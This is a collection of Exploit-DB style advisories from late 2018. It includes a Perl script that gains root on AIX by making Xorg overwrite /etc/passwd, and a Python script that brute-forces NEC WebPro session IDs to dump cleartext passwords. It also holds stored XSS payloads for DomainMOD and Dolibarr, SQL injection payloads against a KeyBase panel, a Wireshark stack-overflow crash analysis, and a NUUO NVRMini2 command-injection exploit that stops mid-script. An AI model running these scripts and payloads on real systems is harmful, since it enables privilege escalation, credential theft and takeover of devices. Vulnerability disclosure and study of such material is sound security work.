# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
# # whoami
# root
#!/usr/bin/perl
print "[+] AIX X11 server local root exploit\n";
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg = `command -v Xorg`);
if ($xorg eq ""){
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
exit;
}
# Check ksh93 is in path
chomp($ksh = `command -v ksh93`);
if ($ksh eq ""){
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
exit;
}
# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array = <$passwd_fh>);
close($passwd_fh);
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd = '';
foreach my $user (@users)
{
$user .= ":";
foreach my $line (@passwd_array)
{
if (index($line, $user) == 0) {
$users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
}
}
}
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log
print "[-] Generating Xorg command \n";
$blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';
print "[-] Opening /tmp/wow.ksh \n";
open($fr, '>', "/tmp/wow.ksh");
# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;
# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");
# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";
# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control
# Date: 2018-11-27
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.rockwellautomation.com/
# Version: 1408-EM3A-ENT B
# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
# CVE : CVE-2018-19616
# 1. Description:
# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, there are a few buttons are disabled,
# such as “Edit”, “Remove”, “AddNew”, “Change Policy Holder” and “Security Configuration”.
# View the source code of login page, those buttons/functions just use the “disabled” parameter to control the access right.
# It is allow attackers using proxy to erase the “disabled” parameter, and enable those buttons/functions.
# Once those buttons/functions are enabled.
# Attackers is capable to add a new user who have administrator right.
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B. 0day***
[Vendor]
www.necam.com
[Affected Product Code Base]
NEC Univerge Sv9100 WebPro - 6.00.00
NEC Univerge WebPro, is a web-based programming tool for the NEC Switch, which is used to program corporate Telephone systems.
Public facing installations as of Dec 1, 2018
https://www.shodan.io/search?query=Server+Henry
Result: 7,797
[Vulnerability Type(s)]
[CVE Reference(s)]
Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage - CVE-2018-11742
[Attack Vectors]
Make repeated remote HTTP requests until arriving at a valid authenticated sessionId.
Security Issue:
================
NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information including passwords stored in clear text in the Web UI.
Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.
e.g..
curl http://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8)
Exploit/POC:
=============
'''
from socket import *
import re
#Univerge Sv9100 NEC WebPro : 6.00
#Dumps user accounts and plaintext passwords stored in Web UI in Administrator Programming Password Setup' webpage
#http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8) "GOTO(8)" will retrieve all account usernames and cleartext passwords.
print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
print "hyp3rlinx"
IP=raw_input("[+] TARGET> ")
res=''
findme="Programming Password Setup"
cnt=0
tmp=False
tmp2=False
pwned=False
#check application is NEC and vuln version
def is_NEC_webpro(u):
global tmp,tmp2,cnt
res=''
cnt+=1
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
while True:
res=s.recv(4048)
if res.find('</html>')!=-1:
break
s.close()
if re.findall(r"\bWebPro\b", res):
tmp=True
if tmp and cnt < 3:
is_NEC_webpro('/Login.htm')
if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res):
tmp2 = True
if tmp == True and tmp2 == True:
return True
return False
def dump(acct):
file=open('NEC-Accounts.txt', 'w')
file.write(acct+'\n')
file.close()
def breach(sid):
global pwned
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
sid=str(sid)
print 'trying sessid '+sid
s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
except Exception as e:
print str(e)
while True:
res = s.recv(4096)
if res.find('</html>')!=-1:
break
if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session.
dump(res)
print res
pwned=True
s.close()
return pwned
def sessgen():
for sessid in range(1000,15000): ##test 14109
if breach(sessid):
break
if __name__=='__main__':
if is_NEC_webpro('/'):
sessgen()
else:
print 'Not NEC or version not vuln.'
'''
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: May 15, 2018
No reply
Vendor Notification: May 18, 2018
No reply
Vendor Notification: June 4, 2018
No reply
Mitre assign CVE: June 5, 2018
JPCERT replies: June 6, 2018
JPCERT shares information with NEC : June 7, 2018
Request status : August 11, 2018
JPCERT contact NEC : August 14, 2018
No reply from vendor
Request status : August 21, 2018
JPCERT again contacts NEC : August 21, 2018
JPCERT "vendor working on a release" : August 23 2018
JPCERT "Vendor release October 2018" : September 12, 2018
NEC "Requests public disclosure after December 1st." : November 19, 2018
December 2, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
'''
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19749
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01(https://github.com/domainmod/domainmod/issues/81)
After logging into the Domainmod application panel, browse to the
assets/add/account-owner.php page and inject a javascript XSS payload
in owner name field
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/81
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19750
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01(https://github.com/domainmod/domainmod/issues/82)
# After logging into the Domainmod application panel, browse to the /admin/domain-fields page, Click Add custom field, and inject a javascript XSS payload in Display Name, Description & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/82
# Exploit Title: Dolibarr ERP/CRM <= 8.0.3 - Cross-Site Scripting
# CVE: CVE-2018-19799
# Date: 2018-11-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://dolibarr.org
# Software Link: http://sourceforge.net/projects/dolibarr/files/
# Version: v8.0.3
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business.
# (customers, invoices, orders, products, stocks, agenda, e-mailings, shipments...)
# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials,
# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
# Dolibarr 8.0.3 is vulnerable; prior versions may also be affected.
# ==================================================================
# PoC:
# GET Request : /exports/export.php?step=2&datatoexport=[XSS PAYLOAD]&action=selectfield&field=pj.ref&page_y=627
################################
# Exploit Title: KeyBase Botnet v1.5 - SQL Injection Vulnerability
# Google Dork: intitle:"KeyBase: Login" + intext:"( Login to get access to your logs )"
# Date: 3/12/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: unkn0wn
# Version: v1.5
# Tested on: Windows 10, debian 7
# CVE : n/a
################################
# Vuln-Code: post.php - variant "keystrokes, passwords, clipboard" & "machinename, machinetime"
if ($_GET['type'] == 'keystrokes')
{
$sqlk = "CREATE TABLE if not exists Keystrokes (id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY, machinename VARCHAR(255) NOT NULL, windowtitle VARCHAR(255) NOT NULL,
keystrokestyped VARCHAR(255), machinetime VARCHAR(255) NOT NULL, ipaddress VARCHAR(255) NOT NULL, date TIMESTAMP)";
if ($conn->query($sqlk) === TRUE) {
$sqlinsertk ="INSERT INTO Keystrokes (id, machinename, windowtitle, keystrokestyped, machinetime, ipaddress, date) VALUES (NULL, '$machinename', '$windowtitle', '$keystrokestyped', '$machinetime', '$ipaddress', '$date')";
if ($conn->query($sqlinsertk) === TRUE) {
echo "<br>Success";
}else{
echo "<br>Error:" . $conn->error;
} } else {
echo "<br>Error:" . $conn->error;
}
################################
PoC:
http://127.0.0.1/post.php?type=keystrokes&machinename=[SQLi]1&machinetime=[SQLi]
################################
Response:
GET parameter 'machinename' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 410 HTTP(s) requests:
---
Parameter: machinename (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: type=keystrokes&machinename=1' RLIKE (SELECT (CASE WHEN (6432=6432) THEN 1 ELSE 0x28 END)) AND 'CbAF'='CbAF&machinetime=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: type=keystrokes&machinename=1' AND (SELECT 9909 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(9909=9909,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwid'='gwid&machinetime=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=keystrokes&machinename=1' AND SLEEP(5) AND 'MWry'='MWry&machinetime=1
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19751
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01(https://github.com/domainmod/domainmod/issues/83)
# After logging into the Domainmod application panel, browse to the /admin/ssl-fields/add.php page and inject a javascript XSS payload in Display Name, Description & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/83
The following crash due to a stack-based out-of-bounds memory access can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==25039==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0298b086 at pc 0x7fb8215577d8 bp 0x7ffc0298b050 sp 0x7ffc0298b048
READ of size 2 at 0x7ffc0298b086 thread T0
#0 0x7fb8215577d7 in cdma2k_message_ACTIVE_SET_RECORD_FIELDS wireshark/epan/dissectors/packet-cdma2k.c:3861:89
#1 0x7fb8215577d7 in cdma2k_message_HANDOFF_DIR wireshark/epan/dissectors/packet-cdma2k.c:3116
#2 0x7fb821546ea5 in cdma2k_message_decode wireshark/epan/dissectors/packet-cdma2k.c:1224:19
#3 0x7fb821544f23 in dissect_cdma2k wireshark/epan/dissectors/packet-cdma2k.c:4406:13
#4 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#5 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#6 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#7 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#8 0x7fb821908908 in gcsna_message_GCSNA1xCircuitService wireshark/epan/dissectors/packet-gcsna.c:211:9
#9 0x7fb821908908 in gcsna_message_decode wireshark/epan/dissectors/packet-gcsna.c:119
#10 0x7fb821908908 in dissect_gcsna wireshark/epan/dissectors/packet-gcsna.c:342
#11 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#12 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#13 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#14 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#15 0x7fb82307a3d3 in dissect_s1ap_Cdma2000PDU wireshark/./asn1/s1ap/s1ap.cnf:638:9
#16 0x7fb82307a3d3 in dissect_Cdma2000PDU_PDU wireshark/./asn1/s1ap/s1ap.cnf:1313
#17 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#18 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#19 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#20 0x7fb82309bd90 in dissect_ProtocolIEFieldValue wireshark/./asn1/s1ap/packet-s1ap-template.c:367:11
#21 0x7fb8220c7430 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:232:5
#22 0x7fb8220c7692 in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:253:9
#23 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#24 0x7fb82309b878 in dissect_s1ap_ProtocolIE_Field wireshark/./asn1/s1ap/s1ap.cnf:145:12
#25 0x7fb8220cec9e in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:564:10
#26 0x7fb8220cec9e in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:939
#27 0x7fb8230a8950 in dissect_s1ap_ProtocolIE_Container wireshark/./asn1/s1ap/s1ap.cnf:158:12
#28 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#29 0x7fb82308f5ee in dissect_s1ap_E_RABSetupRequest wireshark/./asn1/s1ap/s1ap.cnf:2014:12
#30 0x7fb82308f5ee in dissect_E_RABSetupRequest_PDU wireshark/./asn1/s1ap/s1ap.cnf:2945
#31 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#32 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#33 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#34 0x7fb8230a9442 in dissect_InitiatingMessageValue wireshark/./asn1/s1ap/packet-s1ap-template.c:402:11
#35 0x7fb8220c7430 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:232:5
#36 0x7fb8220c7692 in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:253:9
#37 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#38 0x7fb8230a9098 in dissect_s1ap_InitiatingMessage wireshark/./asn1/s1ap/s1ap.cnf:145:12
#39 0x7fb8220d4d35 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1749:4
#40 0x7fb8230993a4 in dissect_s1ap_S1AP_PDU wireshark/./asn1/s1ap/s1ap.cnf:179:12
#41 0x7fb8230993a4 in dissect_S1AP_PDU_PDU wireshark/./asn1/s1ap/s1ap.cnf:3841
#42 0x7fb8230993a4 in dissect_s1ap wireshark/./asn1/s1ap/packet-s1ap-template.c:451
#43 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#44 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#45 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#46 0x7fb82230cd76 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2531:9
#47 0x7fb822306b25 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3494:16
#48 0x7fb822302464 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c
#49 0x7fb8222fffd9 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4610:9
#50 0x7fb8222fffd9 in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4751
#51 0x7fb8222fc59b in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4815:3
#52 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#53 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#54 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#55 0x7fb821b8ee45 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1831:7
#56 0x7fb821bd37d9 in ipv6_dissect_next wireshark/epan/dissectors/packet-ipv6.c:2458:9
#57 0x7fb821bd54d3 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2406:5
#58 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#59 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#60 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#61 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#62 0x7fb821b8f6dd in dissect_ip wireshark/epan/dissectors/packet-ip.c:2315:5
#63 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#64 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#65 0x7fb823377289 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#66 0x7fb823377289 in dissector_try_uint wireshark/epan/packet.c:1407
#67 0x7fb821fb4c99 in dissect_null wireshark/epan/dissectors/packet-null.c:410:12
#68 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#69 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#70 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#71 0x7fb8218f7a28 in dissect_frame wireshark/epan/dissectors/packet-frame.c:579:11
#72 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#73 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#74 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#75 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#76 0x7fb8233721ee in dissect_record wireshark/epan/packet.c:580:3
#77 0x7fb823355068 in epan_dissect_run_with_taps wireshark/epan/epan.c:547:2
#78 0x558d13281917 in process_packet_single_pass wireshark/tshark.c:3572:5
#79 0x558d1327cd12 in process_cap_file wireshark/tshark.c:3403:11
#80 0x558d1327cd12 in real_main wireshark/tshark.c:2046
#81 0x7fb816e972b0 in __libc_start_main
#82 0x558d1317ea49 in _start
Address 0x7ffc0298b086 is located in stack of thread T0 at offset 38 in frame
#0 0x7fb82154fc4f in cdma2k_message_HANDOFF_DIR wireshark/epan/dissectors/packet-cdma2k.c:2856
This frame has 1 object(s):
[32, 34) 'l_offset' <== Memory access at offset 38 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-cdma2k.c:3861:89 in cdma2k_message_ACTIVE_SET_RECORD_FIELDS
Shadow bytes around the buggy address:
0x1000005295c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529600: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x100000529610:[02]f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529630: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f3 f3 f3
0x100000529640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529660: f1 f1 f1 f1 04 f2 02 f3 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25039==ABORTING
--- cut ---
A brief analysis shows that the cdma2k_message_ACTIVE_SET_RECORD_FIELDS() function accepts an "guint16 *l_offset" argument, and successively increases the value under the pointer as it parses through the packet, e.g.:
--- cut ---
3797 *l_offset+=5;
...
3808 *l_offset+=4;
...
3815 *l_offset+=5;
...
3835 *l_offset+=3;
--- cut ---
In lines 3860 and 3865 however, the code increases the pointer itself and not the underlying value, causing it to point to some invalid location on the stack. The extent to which the pointer is shifted by is somewhat controlled by the attacker due to the loop in lines 3862-3867:
--- cut ---
3859 recLen = tvb_get_bits8(tvb,*l_offset, 3);
3860 l_offset+=3;
3861 item2 = proto_tree_add_item(subtree1, hf_cdma2k_Type_Specific_Fields, tvb, (*l_offset/8),recLen+1, ENC_NA);
3862 while(recLen > 0)
3863 {
3864 proto_item_append_text(item2," 0x%02x",tvb_get_bits8(tvb,*l_offset, 8));
3865 l_offset+=8;
3866 recLen-=1;
3867 }
--- cut ---
Later in the code, the corrupted l_offset pointer is both read from and written to multiple times:
--- cut ---
3869 proto_tree_add_bits_item(subtree1, hf_cdma2k_Pwr_Comb_Ind, tvb, *l_offset, 1, ENC_BIG_ENDIAN);
3870 *l_offset+=1;
3871 if(chInd == 5 || chInd == 7)
3872 {
3873 proto_tree_add_bits_item(subtree1, hf_cdma2k_Code_Chan_Fch, tvb, *l_offset, 11, ENC_BIG_ENDIAN);
3874 *l_offset+=11;
3875 proto_tree_add_bits_item(subtree1, hf_cdma2k_Qof_Mask_Id_Fch, tvb, *l_offset, 2, ENC_BIG_ENDIAN);
3876 *l_offset+=2;
3877 }
--- cut ---
Such non-continuous stack-based OOB writes could be leveraged to execute arbitrary code in the context of the Wireshark process.
The bug was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15322. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45950.zip
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19752
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the /assets/add/registrar-account.php page and inject a javascript XSS payload in registrar Name, registrar url & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/84
# Exploit Title: NUUO NVRMini2 Authenticated Command Injection
# Date: December 3, 2018
# Exploit Author: Artem Metla
# Vendor Homepage: https://www.nuuo.com/ProductNode.php?node=2#
# Version: 3.9.1
# Tested on: NUUO NVRMini2 with firmware 3.9.1
# CVE : CVE-2018-15716
# Advisory: https://www.tenable.com/security/research/tra-2018-41
import argparse
import requests
import urllib.parse
import binascii
import http.cookiejar as cookielib
import re
def run(target, username, password, command):
""" Authenticate us and execute exploitation """
# Step 1. Authentication
payload = {'language':'en', 'user':username, 'pass':password,
'submit':'Login'}
r = requests.post(urllib.parse.urljoin(target, 'login.php'),
data=payload, verify=False, allow_redirects=False)
jar = r.cookies
# Step 2. Prepare a payload
# We're bypassing 2 filters:
# 1) Instead of using ";" we can try || or &&, to bypass:
# if(strpos($uploaddir, ';') !== false)
# {
# die('[1]Not a valid path.');
# }
# 2) To bypass this:
# $cmd = "sed -i 's/".str_replace('/', '\/',
$current_dir)."/".str_replace('/', '\/', $tmp_upload_dir)."/g'
".PHP_CINF_PATH;
# we have to HEX encode a payload
#
# Simple example of payload that we're trying to achieve: '||ls`echo
-e "\\x20\\x2f"`||' to execue: ls /
# 3) Multiple parameters commands are not supported yet, but the same
techique could be used for them
# Primitive Bash command parser
splitted_command = [command]
for i in range(0, len(command)-1):
if command[i] == " " and command[i+1] != "-":
splitted_command = [command[:i], command[i+1:]]
break
# Encoding a payload
if len(splitted_command) == 2:
payload = "".join('\\\\x%s' %
binascii.hexlify(char.encode('ascii')).decode("utf-8") for char in
splitted_command[1])
exploit = '\'||%s `echo -e "%s"`||\'' % (splitted_command[0],
payload)
print("Exploit: %s" % exploit)
else:
exploit = '\'||%s||\'' % (splitted_command[0])
print("Exploit: %s" % exploit)
# Step 3. Send a payload
payload = {'cmd':'writeuploaddir', 'uploaddir':exploit}
r = requests.get(urllib.parse.urljoin(target, 'upgrade_handle.php'),
params=payload, verify=False, cookies=jar)
# Step 4. Output processing to grab only needed output
res = re.search('upload_tmp_dir=([^<>]*)<br />', str(r.content))
if res:
print(res.group(1).replace('\\n', '\n'))
def main():
""" Parse command line arguments and start exploit """
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="Examples: %(prog)s -t http://192.168.0.1/ -u username
-p password -c whoami")
# Adds arguments to help menu
parser.add_argument("-h", action="help", help="Print this help message
then exit")
parser.add_argument("-t", dest="target", required="yes", help="Target
URL address like: https://localhost:443/")
